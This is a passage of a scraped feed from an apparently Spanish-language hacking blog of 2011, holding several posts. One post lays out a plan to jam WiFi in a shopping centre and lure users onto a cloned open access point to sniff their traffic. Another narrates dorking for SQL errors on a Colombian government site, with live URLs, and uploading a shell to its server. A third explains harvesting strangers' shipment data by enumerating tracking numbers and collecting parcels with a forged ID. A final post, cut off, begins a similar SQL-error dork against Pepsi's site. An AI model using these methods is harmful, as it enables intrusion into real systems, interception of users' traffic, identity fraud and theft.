type='html'>[&lt;i&gt;Bueno debido a mi ausencia durante unas semanas, surge este articulo que lo dividire en 2, segun los tipos de señales que explicaré (WIFI, GSM).&lt;/i&gt;]&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ZBQIdCaO2Ck/TuAqKYCbDnI/AAAAAAAAAGI/421EQoETw4w/s1600/inhi.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="232" width="320" src="http://3.bp.blogspot.com/-ZBQIdCaO2Ck/TuAqKYCbDnI/AAAAAAAAAGI/421EQoETw4w/s320/inhi.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Este articulo se me ocurrio hacerlo por un "Recuerdo de viejos tiempos"; la ausencia que tuve estos dias fue debido a mi traslado de apartamento, viendo en el trasteo las cosas viejas que tenia... logre notar una pequeña caja negra pegada con cinta y hecha con un esquema demasiado rustico!!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Pero que era exactamente esa pequeña caja negra?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Esta pequeña caja era un &lt;b&gt;INHIBIDOR DE SEÑAL&lt;/b&gt; que fue el resultado de unas pocas clases de electronica que habia tomado un compañero. Era demasiado rustico y no carecia de una funcionalidad excelente debido a que era casera y no se tenian unos masteriales de alta calidad, pero te preguntaras...&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Que es un inhibidor o perturbador de señal?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Segun wikipedia&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;En Telecomunicación, un perturbador, también denominado inhibidor es un Dispositivo electrónico que impide o dificulta las transmisiones radioeléctricas en un determinado rango de frecuencias mediante la emisión de una señal de mayor potencia que la del emisor que quiere transmitir.&lt;br /&gt;&lt;br /&gt;Se compone básicamente de un generador de señal y un transmisor. El primero genera una señal que es enviada a través del segundo con una potencia determinada según la necesidad. Esta señal carece de información útil, únicamente es una señal generada por un oscilador o generador de onda. Ésta, al emitirse con mayor potencia que los sistemas de transmisión a interferir, las suprime, evitando que emisor y receptor establezcan la comunicación.&lt;br /&gt;&lt;br /&gt;Se utiliza principalmente por motivos de seguridad o con intenciones de sabotaje.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Segun MaztoR&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Dispositivo que no permite un transcurso de señal, impidiendo, dificultando y/o creando difusion en el receptor por que esta ocupa esa frecuencia con otra señal mucho mas potente. :P (corregirme si estoy mal)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Bueno iniciemos la objetividad de este articulo...&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;ya sabemos perfectamente que es un Inhibidor de señal (si no te quedo claro para eso esta google XD) pero ahora debemos plantear un "&lt;b&gt;ESCENARIO PERFECTO&lt;/b&gt;" desde la perspectiva de un "Atacante Malicioso" la cual consta de reemplazos o sustituciones de puntos de acceso para asi el atacante obtener un "beneficio" y una administracion de conexiones o host vibrantes en el punto "CLON" que logicamente sera el que nosotros pondremos de señuelo.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;primero que nada cabe hay que aclarar ciertos puntos&lt;/b&gt;:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt; Un inhibidor tiene un rango de X MTS/KMTS definidos a la redonda (todo depende del tipo de inhibidor)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2-&lt;/b&gt; Aqui se planteara un escenario usando inhibidores portables y de poco alcance (ya sabran el porque)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Primer Escenario... [&lt;i&gt;El Centro Comercial&lt;/i&gt;]&lt;br /&gt;-------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-RszTT463bPM/TuAiGLKP56I/AAAAAAAAAF8/I7eG0fZL8fk/s1600/inhibidor.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="320" src="http://2.bp.blogspot.com/-RszTT463bPM/TuAiGLKP56I/AAAAAAAAAF8/I7eG0fZL8fk/s320/inhibidor.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bueno viendo bien el grafico se puede notar que lo que hacemos es dejar a un cierto grupo de personas sin recepcion de señal y creando un nuevo punto de acceso con un nombre COPIA para hacer confusion en los usuario, copn el objetivo de que intente un reconexion buscando en su lista de detectados (logico no saldra nada por que la zona esta inhibida) pero dejamos el inhibidor unos 10 min para que los usuarios pierdan la total conexion WIFI por que si lo hacemos en fraccion de segundos no habria desconexion debido a que hace reconexion simultanea, al estar seguros de una desconexion total desactivamos el inhibidor y hacemos que nuestro punto de acceso este lo mas cerca posible con el objetivo de que elijan el punto "CLON" con mas señal, osea el de nosotros por la cercania no les parece?....&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nota&lt;/b&gt;: hay muchas formas de hacer puntos de acceso, te doy algunas ideas... usando tus Dispositivos Iphone, ipad por la portabilidad, con portatiles + modems etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno ya teniendo un punto de acceso propio podemos hacer una administracion de nuestros host activos, pudiendo interceptar su trafico, sniffearlos o como le quieras hacer :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ahora te preguntaras.. no es mas facil conectarse al punto principal (original) y evitar todo este proceso?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Veamos no escribo cosas por nada jajaja, que tal si la clave no la sabemos?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Repuesta&lt;/i&gt;&lt;br /&gt;creamos el punto de acceso sin clave y que sea CLON, para una conexion mas directa para los usuarios.. por que si le ponemos clave... ellos no la sabria debido a que pondrian la clave que ellos saben, pero como no la sabemos hay perdida...&lt;br /&gt;&lt;br /&gt;&lt;b&gt;De que sirve si las pcs pueden tener palomeada la opcion de "Conectarse automaticamente"&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Respuesta&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Simple con ingenio se logra que conecten al punto "CLON".. haber te doy una idea..&lt;br /&gt;&lt;br /&gt;PUNTO ORIGINAL LLAMADO= CENTROCOMERCIAL&lt;br /&gt;PUNTO CLON LLAMADO= CENTROCOMERCIAL ESTABLE&lt;br /&gt;&lt;br /&gt;ponemos el inhibidor en intermitencia para que haga una especie de prendido/apagado y los usuarios tengan una pesima señal... asi que veran el punto de wifi "ESTABLE"&lt;br /&gt;y decidiran usarlo :) (Este se prueba en intervalos para no perjudicar las conexiones a nuestro punto de acceso)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;h1&gt;Este es realmente un Escenario perfecto?&lt;/h1&gt;&lt;/center&gt; &lt;br /&gt;&lt;br /&gt;&lt;i&gt;La segunda parte tratara sobre inhibidores de señal telefonica GSM, Saludos y happy Attack?&lt;/i&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-3734399120659335845?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/3734399120659335845/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/12/inhibidores-de-senal-el-escenario.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3734399120659335845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3734399120659335845'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/12/inhibidores-de-senal-el-escenario.html' title='Inhibidores de Señal [El escenario perfecto] [WIFI]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-ZBQIdCaO2Ck/TuAqKYCbDnI/AAAAAAAAAGI/421EQoETw4w/s72-c/inhi.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-1931089818146342375</id><published>2011-11-18T12:07:00.000-08:00</published><updated>2011-11-18T12:09:58.394-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exposed&apos;s'/><title type='text'>Exposed! W4 ICFES.. tan inseguro que parece a proposito?</title><content type='html'>Bueno sin hacer nada me puse a divagar en "&lt;i&gt;PAPI GOOGLE&lt;/i&gt;"  dorkeando en algunas webs del gobierno.. haciendo combinaciones y viendo que resultados obtendria.&lt;br /&gt;&lt;br /&gt;[&lt;b&gt;&lt;i&gt;Se muestra el procedimiento tan simple y basico de acceso para demostrar que la entrada a este servidor colombiano TAN PRESTIGIOSO! no fue mas que una ESTUPIDEZ!&lt;/i&gt;&lt;/b&gt;]&lt;br /&gt;&lt;br /&gt;comence probando con PRESI***CI* solo logre ver algunos datos y documentos en directorios cerrados.. pero me aburri XD! de tanto buscar, pero me acorde que hace unos dias habia visto XSS en la web del ICFES y supose que al tener algunas zonas administradas con code propio para sus gestiones etc, supuse que habria algo mas COMPROMETEDOR :) y decido armar la siguiente dork:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;intext:you have an error in your sql syntax site:icfes.gov.co&lt;/pre&gt;&lt;i&gt;En busca de vulnerabilidades SQLI tanto internas como en variables...&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Como resultado solo obtuve 1 IRONICO NO?&lt;/i&gt; &lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Rnd7L9lULHE/Tsa0DkzjC-I/AAAAAAAAAD4/DisHsapflHI/s1600/Selecci%25C3%25B3n_016.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="137" width="320" src="http://2.bp.blogspot.com/-Rnd7L9lULHE/Tsa0DkzjC-I/AAAAAAAAAD4/DisHsapflHI/s320/Selecci%25C3%25B3n_016.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;veamos que es lo que hay despues de ese link :)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://w4.icfes.gov.co:8091/its-gestion/lib/mejora/ciclos.php?anio_auditoria="&gt;http://w4.icfes.gov.co:8091/its-gestion/lib/mejora/ciclos.php?anio_auditoria=&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-pmZPmo-lQII/Tsa0gGjZEyI/AAAAAAAAAEE/T36neao23qM/s1600/Selecci%25C3%25B3n_016.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="137" width="320" src="http://2.bp.blogspot.com/-pmZPmo-lQII/Tsa0gGjZEyI/AAAAAAAAAEE/T36neao23qM/s320/Selecci%25C3%25B3n_016.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;la verdad vi las variables y me desilucione un poco pero vi la cadena de directorios...&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;/its-gestion/lib/mejora/  &lt;/pre&gt;&lt;br /&gt;INDEXADOS! &lt;strike&gt;cuantas veces hay que resaltar &lt;/strike&gt; que dejar los directorios a la vista de todos esta MAL! :( muy &lt;b&gt;MAL!&lt;/b&gt; y mucho peor si hay tanta INFO y sub-directorios como en este caso...&lt;br /&gt;Demos un pequeño repaso... en los directorios :)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-70lPXCCSOU4/Tsa1fbXNwvI/AAAAAAAAAEQ/PZgfJxJ-lW0/s1600/Selecci%25C3%25B3n_017.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="149" width="320" src="http://3.bp.blogspot.com/-70lPXCCSOU4/Tsa1fbXNwvI/AAAAAAAAAEQ/PZgfJxJ-lW0/s320/Selecci%25C3%25B3n_017.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-amUZul6BuMA/Tsa1njrKD0I/AAAAAAAAAEc/wxex8FYlrPc/s1600/Selecci%25C3%25B3n_019.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="240" src="http://1.bp.blogspot.com/-amUZul6BuMA/Tsa1njrKD0I/AAAAAAAAAEc/wxex8FYlrPc/s320/Selecci%25C3%25B3n_019.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DEMASIADO NO?&lt;/b&gt; hasta el punto de hecharme a reir y pensar &lt;i&gt;PARECE TODO A PROPOSITO XD!&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;naveguemos un poco por&lt;a href="http://w4.icfes.gov.co:8091/its-gestion/lib/meci/"&gt; http://w4.icfes.gov.co:8091/its-gestion/lib/meci/&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Notaremos en el directorio /meci/ varios archivos y un presunto UPLOADER! :)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-NmpmRaQ5Zeg/Tsa2m3QtNdI/AAAAAAAAAEo/Z2nB2h4wpcg/s1600/Selecci%25C3%25B3n_020.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="238" width="320" src="http://1.bp.blogspot.com/-NmpmRaQ5Zeg/Tsa2m3QtNdI/AAAAAAAAAEo/Z2nB2h4wpcg/s320/Selecci%25C3%25B3n_020.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Analizando el escenario se supone que lo que se suba por medio de &lt;b&gt;adjuntar_archivos.php&lt;/b&gt; quedaria en el directorio&lt;strike&gt; Archivos&lt;/strike&gt; logico no?&lt;br /&gt;&lt;br /&gt;Al intentar subir algo veamos el resultado !!&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ipa0hrX7suU/Tsa39BdzBfI/AAAAAAAAAE0/3zOU9o05SLo/s1600/Selecci%25C3%25B3n_021.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="78" width="320" src="http://4.bp.blogspot.com/-ipa0hrX7suU/Tsa39BdzBfI/AAAAAAAAAE0/3zOU9o05SLo/s320/Selecci%25C3%25B3n_021.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Errores sql bla bla bla y mas bla.. a veces salen errores y sentencias pero el archivo logra subir.. pero en este caso no es asi :/&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-JCh2GmXvqzQ/Tsa4OP9GY_I/AAAAAAAAAFA/UNxi1q1OgKo/s1600/Selecci%25C3%25B3n_022.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="306" src="http://3.bp.blogspot.com/-JCh2GmXvqzQ/Tsa4OP9GY_I/AAAAAAAAAFA/UNxi1q1OgKo/s320/Selecci%25C3%25B3n_022.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;me dio algo de intriga a la vez... asi que decido jugar con las variables :)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Antes:&lt;/b&gt; /adjuntar_archivos.php?id=&lt;br /&gt;&lt;b&gt;despues:&lt;/b&gt; /adjuntar_archivos.php?id=1&lt;br /&gt;&lt;br /&gt;Al dar enter el uploader se veia un mejor y con el mensaje de limite&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Flmqo2YW4Fs/Tsa4zvTMA6I/AAAAAAAAAFM/WJ-gxkUEyEs/s1600/Selecci%25C3%25B3n_023.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="58" width="320" src="http://3.bp.blogspot.com/-Flmqo2YW4Fs/Tsa4zvTMA6I/AAAAAAAAAFM/WJ-gxkUEyEs/s320/Selecci%25C3%25B3n_023.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;y al subir algo :) salia un listado brindandome 2 opciones de nombre y eliminar :)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-OswDKE_RBpI/Tsa5G8GqNuI/AAAAAAAAAFY/KgxqbW_53kY/s1600/Selecci%25C3%25B3n_023.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="58" width="320" src="http://2.bp.blogspot.com/-OswDKE_RBpI/Tsa5G8GqNuI/AAAAAAAAAFY/KgxqbW_53kY/s320/Selecci%25C3%25B3n_023.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Como cambio la cosa no? ahora veamos que nos brinda nuestra shell :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-o1N9xYV2onc/Tsa5pC5P4eI/AAAAAAAAAFs/-9z9yq0hPFE/s1600/Selecci%25C3%25B3n_026.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="214" width="320" src="http://4.bp.blogspot.com/-o1N9xYV2onc/Tsa5pC5P4eI/AAAAAAAAAFs/-9z9yq0hPFE/s320/Selecci%25C3%25B3n_026.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-4pQ2NVN-D5A/Tsa5pOD8c3I/AAAAAAAAAFk/u6yiphbPNwg/s1600/Selecci%25C3%25B3n_025.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="294" width="320" src="http://1.bp.blogspot.com/-4pQ2NVN-D5A/Tsa5pOD8c3I/AAAAAAAAAFk/u6yiphbPNwg/s320/Selecci%25C3%25B3n_025.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Los 2 discos o particiones no me fije XD Activos en &lt;b&gt;WINDFUCK&lt;/b&gt; son C:/ y D:/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Conclusion!&lt;/b&gt;&lt;br /&gt;&lt;i&gt;Con todo esto y analizando este articulo parece todo de primaria no?&lt;/i&gt;&lt;br /&gt;Creanme que con solo un "deny" o un index en blanco no se hubiera llegado muy lejos en la exploracion de archivos y directorios a menos que se use un brute dir o brute name pero ya seria un metodo mas complicado....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-1931089818146342375?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/1931089818146342375/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/11/exposed-w4-icfes-tan-inseguro-que.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1931089818146342375'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1931089818146342375'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/11/exposed-w4-icfes-tan-inseguro-que.html' title='Exposed! W4 ICFES.. tan inseguro que parece a proposito?'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-Rnd7L9lULHE/Tsa0DkzjC-I/AAAAAAAAAD4/DisHsapflHI/s72-c/Selecci%25C3%25B3n_016.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-4549052910750573417</id><published>2011-10-27T16:53:00.000-07:00</published><updated>2011-11-09T13:11:59.924-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Pentesting'/><category scheme='http://www.blogger.com/atom/ns#' term='Auditorias'/><category scheme='http://www.blogger.com/atom/ns#' term='Ing-Social'/><title type='text'>Interceptacion de Entregas y Paqueteria "Servientrega"</title><content type='html'>Bueno en este articulo voy a hablar de un servicio muy conocido llamado "Servientrega" muy similar al famoso "FEDEX", el cual para quien no lo sabe es un sistema de mensajeria y paqueteria USUALMENTE puerta a puerta o de recogida central.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://imagengratis.org/images/servientrega.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="340" width="490" src="http://imagengratis.org/images/servientrega.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hoy 27 de oct de 2011 venia de clases y decidi pasar por la central a ver si ya me habia llegado un paquete que me habia enviado 2 dias atras, entregue mi tarjeta de identificacion y me digeron que ya estaba hay y que se podia retirar, bueno analizando la situacion todo muy bien, pero note que con solo dar ciertos datos y tener una identificacion se podria retirar un paquete sin problemas, vaya!! es muy "DIFICIL" ante muchos conseguir toda la informacion de un envio:&lt;br /&gt;&lt;br /&gt;quien envia, quien recibe, lugar, identificaciones ,etc.&lt;br /&gt;&lt;br /&gt;Mucho mas dificil tener la identificacion del receptor!! hacerse con ella y obtener un paquete, al parecer todo esta bien por que es "DIFICIL" conseguir toda esa info sin conocer a la persona, seamos francos y vayamos a la realidad.&lt;br /&gt;&lt;br /&gt;Al retirar mi paquete tenia que pagar un valor que se definia segun la distancia y el peso como en el momento no estaba conciente de que la persona que enviaba no iba a pagar el envio y era del metodo "AL COBRO" (el cual consiste en pagar una vez recibido el paquete) decido ir a mi casa y buscar dinero para poder hacer el retiro!, aqui es donde se enciende la luz... al ver mi NUMERO DE GUIA lo meti en el Rastreador de envios que tiene la pagina.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;www.servientrega.com/wps/portal/inicio&lt;/pre&gt;&lt;br /&gt;Me imprimio los datos completos de mi envio... asi que decido crear un numero secuencial para ver si habia otro numero de guia y correspondia a otro paquete.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Mi numero de Guia=&lt;/b&gt; 7171257XXX&lt;br /&gt;&lt;b&gt;Numero Aleatorio=&lt;/b&gt; 7171257298&lt;br /&gt;&lt;br /&gt;Efctivamente el numero secuencial con las ultimas tres cifras aleatorias me dio la informacion completa de un envio que claramente no era el mio.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://imagengratis.org/images/pantallazmv6em.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="427" width="632" src="http://imagengratis.org/images/pantallazmv6em.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;i&gt;Imagen no omitida por ser un caso real y con ejemplificacion no puesta en practica con este terciario&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;vaya es info linda y valiosa...logramos ver:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;REMITENTE&lt;br /&gt;DESTINATARIA&lt;br /&gt;DIRECCIONES&lt;br /&gt;FECHAS PIEZAS&lt;br /&gt;DESTINOS&lt;br /&gt;y Lugar donde se encuentra el paquete :D&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Ahora como muchos saben el photoshop hace maravillas!! y con un facil manejo de nivel basico-medio se puede hacer un Identificacion falsa.&lt;br /&gt;&lt;br /&gt;Te preguntaras "ESTO NO FUNCIONARA" esa gente sabe como detectar eso y lo otro y bla bla bla... MENTIRA!! en el tiempo que llevo recibiendo paquetes y mi analisis segun su comportamiento NUNCA se han fijado en datos distintos a los &lt;b&gt;ESENCIAL [NOMBRE Y NUMERO DE ID]&lt;/b&gt; asi que en pocas palabras la seguridad de informacion que fluyetanto entrante como saliente es INSEGURA!!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Planteemos el Escenario&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt;Tenemos la ID falsa lista&lt;br /&gt;&lt;b&gt;2-&lt;/b&gt;Hacemos una llamada a la central para saber si el articulo aun esta en bodega&lt;br /&gt;&lt;b&gt;3-&lt;/b&gt;se repasa un poco la info de memoria, no se quiere fallar al momento de las preguntas superficiales.&lt;br /&gt;&lt;b&gt;4-&lt;/b&gt; se recibe el articulo y te vas.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;QUE INSEGURO NO???&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Seamos francos, lo peor de todo es que los numeros de GUIAS se pueden explorar en rangos y nos da distintos DESTINOS y LUGARES DE ENVIOS, es dificil para un particular estar viajando y cazando los envios de otros, pero pensemos.. que tal si una organizacion de varias personas en todo el pais, [ESTO SE PUEDE GRACIAS A INTERNET] se dedica a esto? creanme que muchos envian cosas de valor y podrian haber perdidas millonarias.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nota:&lt;/b&gt;no en todas se fuga la ID del cliente, dependiendo del tipo de documento esta sera impresa.&lt;br /&gt;&lt;br /&gt; &lt;i&gt;Fugas:&lt;/i&gt; CC No se Imprime , TI si se imprime, DT si se imprime, otro Tipo de Documento si se imprime.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CONCLUSION&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;No esta demas aclarar que mis articulos no son probados CON TERCEROS REALES debido a que si algo falla no quiero terminar en la carcel jajaja y la idea no es ROBAR es analizar la seguridad para reforzarla y que errores asi no lo sepan personas con fines perversos.&lt;br /&gt;&lt;br /&gt;Pero tambien aclaro que esto fue probado 100% en el cual un amigo se hace pasar por mi para retirar mi paquete ;) y todo salio bien, que inseguridad por dios jajaja PWNED!!!&lt;br /&gt;&lt;br /&gt;Saludos y greetz: DRAGONJAR - DDLR - CYBERLOCOS&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-4549052910750573417?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/4549052910750573417/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/10/interceptacion-de-entregas-y-paqueteria.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4549052910750573417'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4549052910750573417'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/10/interceptacion-de-entregas-y-paqueteria.html' title='Interceptacion de Entregas y Paqueteria &quot;Servientrega&quot;'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-4745663176169947149</id><published>2011-09-21T19:00:00.000-07:00</published><updated>2011-09-23T18:02:43.713-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exposed&apos;s'/><title type='text'>EXPOSED!! PEPSI "Change The game"</title><content type='html'>Bueno abriendo esta categoria en mi blog, decido inaugurar por asi decir jajaja con un bonito,curioso,beneficiario "EXPOSED" hecho a la web de "PEPSICHANGETHEGAME" perteneciente a la conocidad marca de bebidas gaseosas "PEPSI".&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_EtSbZlb0Cgs/SKWO5_fp6II/AAAAAAAAAPA/T2hyUiyyc1I/s320/pepsi8vb.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="164" width="320" src="http://4.bp.blogspot.com/_EtSbZlb0Cgs/SKWO5_fp6II/AAAAAAAAAPA/T2hyUiyyc1I/s320/pepsi8vb.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Debido a mi curiosidad decido armar una dork de la siguiente forma:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;blockquote&gt;intext:You have an error in your SQL intitle:pepsi&lt;/blockquote&gt;&lt;/b&gt;&lt;br 